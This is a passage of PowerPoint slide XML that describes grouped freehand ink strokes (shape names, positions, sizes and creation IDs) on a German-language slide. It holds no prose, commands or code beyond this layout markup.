              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4931926" y="2571794"/>
                <a:ext cx="132120" cy="151560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1071" name="Freihand 1070">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF45DDF0-52C1-4059-93A5-2D5AAEB46B9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23286" y="2562794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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5017246" y="2702474"/>
                <a:ext cx="11520" cy="6480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1073" name="Freihand 1072">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFAC937-2957-4D57-81BD-92CE54F409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08246" y="2693834"/>
                  <a:ext cx="2916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4" name="Gruppieren 1153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC7B641-B3E1-4C34-9BE8-1B6E5DED0EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3453406" y="2163678"/>
            <a:ext cx="1801080" cy="264240"/>
            <a:chOff x="3453406" y="3382874"/>
            <a:chExt cx="18010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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3508486" y="3419594"/>
                <a:ext cx="1746000" cy="227520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1075" name="Freihand 1074">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E919133-621D-4416-A102-E48E8F2F5E9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499486" y="3410954"/>
                  <a:ext cx="1763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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3453406" y="3382874"/>
                <a:ext cx="264240" cy="157320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1076" name="Freihand 1075">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD02FED-612D-40E3-A8FD-AA23CC0C264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44406" y="3374234"/>
                  <a:ext cx="2818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3" name="Gruppieren 1152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71BDADD-765D-4DED-B435-D99857DE7324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3454846" y="2405238"/>
            <a:ext cx="2040120" cy="342000"/>
            <a:chOff x="3454846" y="3624434"/>
            <a:chExt cx="20401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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3454846" y="3668354"/>
                <a:ext cx="131400" cy="247320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1078" name="Freihand 1077">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04B84C3C-525D-42A8-972E-FFEBEC08F3E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445846" y="3659714"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3640246" y="3900194"/>
                <a:ext cx="360" cy="2520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1079" name="Freihand 1078">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB51BD93-898E-4343-95D0-95E42A8DD96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31606" y="38911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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3706126" y="3784634"/>
                <a:ext cx="28440" cy="150840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1081" name="Freihand 1080">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88921FB1-4B72-47C2-93CF-8E143336E94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7486" y="3775634"/>
                  <a:ext cx="46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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3683086" y="3714794"/>
                <a:ext cx="210960" cy="165600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1082" name="Freihand 1081">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3914E4DC-25CD-474A-BF41-5AF19BA0C1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74086" y="3705794"/>
                  <a:ext cx="22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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3912046" y="3813074"/>
                <a:ext cx="128160" cy="107280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1083" name="Freihand 1082">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C212CB79-B7A5-4432-9C21-62BC1CBBD61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3406" y="3804074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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4015366" y="3754034"/>
                <a:ext cx="83160" cy="177120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1084" name="Freihand 1083">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A1A34F8-98C8-4F8E-B901-5B3842B75B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06366" y="3745034"/>
                  <a:ext cx="100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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4139926" y="3851954"/>
                <a:ext cx="59400" cy="81360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1085" name="Freihand 1084">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{021B321A-DDAA-410D-8ADF-26341FD42B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31286" y="3842954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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4241446" y="3873914"/>
                <a:ext cx="27360" cy="64800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1086" name="Freihand 1085">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6593A436-948A-4047-BC96-4119033F668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32806" y="3865274"/>
                  <a:ext cx="45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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4226326" y="3779594"/>
                <a:ext cx="19440" cy="31680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1087" name="Freihand 1086">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD0B1B5F-9222-403B-AD2C-C69AB3BAF94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7686" y="3770594"/>
                  <a:ext cx="3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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4282126" y="3865994"/>
                <a:ext cx="83880" cy="96120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1088" name="Freihand 1087">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55221E62-540C-424A-8AE9-A4576021B92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273126" y="3856994"/>
                  <a:ext cx="10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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4377526" y="3852314"/>
                <a:ext cx="85680" cy="96480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1089" name="Freihand 1088">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E7E01F2-19C2-425D-90DD-F5CF391601A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68526" y="3843314"/>
                  <a:ext cx="103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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4487326" y="3826034"/>
                <a:ext cx="111600" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1090" name="Freihand 1089">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF0F47AB-81B3-43C3-B149-38AF2123A7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78326" y="3817034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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4714846" y="3786794"/>
                <a:ext cx="27720" cy="164160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1092" name="Freihand 1091">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F94E39A7-2E4F-4A23-B1DD-FE42D4DCCE7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06206" y="3777794"/>
                  <a:ext cx="45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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4695406" y="3724154"/>
                <a:ext cx="125640" cy="113040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1093" name="Freihand 1092">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9856C023-E0A3-49E6-8761-87C678CE907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686766" y="3715154"/>
                  <a:ext cx="143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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4803766" y="3836834"/>
                <a:ext cx="132120" cy="70560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1094" name="Freihand 1093">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DE918FC-77FD-436E-8A45-5344FD6898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794766" y="3828194"/>
                  <a:ext cx="149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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4955326" y="3810554"/>
                <a:ext cx="89280" cy="155880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1095" name="Freihand 1094">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46EA03D4-F947-40CB-8598-36B349BF69B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6686" y="380191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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5044606" y="3714434"/>
                <a:ext cx="54720" cy="159840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1096" name="Freihand 1095">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD661B8-8BC8-435D-B826-585E98A230A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35606" y="3705434"/>
                  <a:ext cx="72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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5102926" y="3786794"/>
                <a:ext cx="70560" cy="53280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1097" name="Freihand 1096">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96AB38D2-3E01-4A9E-BBE5-084C51B2DDD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093926" y="3778154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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5211286" y="3749354"/>
                <a:ext cx="101160" cy="76320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1098" name="Freihand 1097">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E3D43E-5B07-4763-8691-8097F4F0A63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202646" y="3740714"/>
                  <a:ext cx="118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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5316046" y="3706514"/>
                <a:ext cx="109080" cy="93600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1103" name="Freihand 1102">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{980A7975-8DD7-4C77-AA25-691EEC610D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07406" y="3697874"/>
                  <a:ext cx="126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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5339446" y="3624434"/>
                <a:ext cx="155520" cy="153000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1104" name="Freihand 1103">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D74D47E6-0D00-4E5B-99E4-9DFE82EA860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30446" y="3615434"/>
                  <a:ext cx="17316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2" name="Gruppieren 1151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA7DEBB-69B3-4AEF-8FA2-4E1D5B9AF097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1905766" y="2674518"/>
            <a:ext cx="796320" cy="438840"/>
            <a:chOff x="1905766" y="3893714"/>
            <a:chExt cx="79632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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1927366" y="3893714"/>
                <a:ext cx="662040" cy="188640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1106" name="Freihand 1105">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{356EABA0-C4EC-496F-BB1B-9EBEED51EA9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18726" y="3884714"/>
                  <a:ext cx="679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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2445406" y="3951314"/>
                <a:ext cx="256680" cy="109800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1107" name="Freihand 1106">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AB39E28-9ED5-4EFA-AC0C-6FB04BB4583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436766" y="3942314"/>
                  <a:ext cx="274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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1933486" y="4111874"/>
                <a:ext cx="678600" cy="220680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1108" name="Freihand 1107">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E57F646D-B2BB-4B83-8C41-518184132F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24486" y="4102874"/>
                  <a:ext cx="69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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1905766" y="4185314"/>
                <a:ext cx="183240" cy="138960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1109" name="Freihand 1108">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F142728F-5606-4F24-94AE-2314F1C4F8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896766" y="4176674"/>
                  <a:ext cx="20088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1" name="Gruppieren 1150">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D186CA7A-2A92-46D2-BA6B-7E5E81E18832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1389518" y="3198749"/>
            <a:ext cx="1976040" cy="338400"/>
            <a:chOff x="1707406" y="4351994"/>
            <a:chExt cx="19760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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1707406" y="4406354"/>
                <a:ext cx="102240" cy="148680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1111" name="Freihand 1110">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B868616-3F94-4B7D-A6FA-F92A4DDABF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698406" y="4397714"/>
                  <a:ext cx="119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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1828726" y="4491314"/>
                <a:ext cx="20880" cy="95760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1112" name="Freihand 1111">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E97DB021-2675-4673-98FA-A4FFDF91215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19726" y="4482314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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1914046" y="4588514"/>
                <a:ext cx="11880" cy="14040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1113" name="Freihand 1112">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1055B31-47CF-4F41-A993-9D1F8A53CDF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05046" y="4579874"/>
                  <a:ext cx="29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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2032126" y="4462514"/>
                <a:ext cx="21960" cy="120960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1114" name="Freihand 1113">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20100FE7-03F4-4ADD-B365-5CEBDA6BE64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023126" y="4453874"/>
                  <a:ext cx="3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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2010886" y="4417154"/>
                <a:ext cx="89640" cy="26640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1115" name="Freihand 1114">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70A9C200-A262-4F3C-9A36-5A6CF0E3AB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002246" y="4408514"/>
                  <a:ext cx="107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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2034286" y="4534874"/>
                <a:ext cx="92880" cy="9360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1116" name="Freihand 1115">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FA5127-5119-4466-B758-387ECA65C6D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25646" y="4526234"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2067046" y="4585634"/>
                <a:ext cx="102600" cy="26280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1117" name="Freihand 1116">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7B2F1B1-1336-42E0-9BE0-23CCDEF46D9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58046" y="4576994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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2166046" y="4536674"/>
                <a:ext cx="105120" cy="73080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1118" name="Freihand 1117">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AA3B8B0-ACC6-4DC5-9FC7-6FDA6E4CD63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57406" y="4528034"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2169646" y="4503914"/>
                <a:ext cx="101520" cy="86040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1119" name="Freihand 1118">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BBEC250-D8D5-4167-B007-3B39D23F2A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61006" y="4495274"/>
                  <a:ext cx="119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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2298166" y="4492754"/>
                <a:ext cx="105120" cy="96120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1120" name="Freihand 1119">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10F5F8AC-D1C8-47A6-A4CE-BCF867706A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89166" y="4484114"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2406526" y="4483394"/>
                <a:ext cx="101520" cy="101520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1121" name="Freihand 1120">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E02F9E7C-B0D7-4C47-96C7-122DC035FC3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7886" y="4474754"/>
                  <a:ext cx="119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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2604526" y="4576274"/>
                <a:ext cx="3960" cy="2880"/>
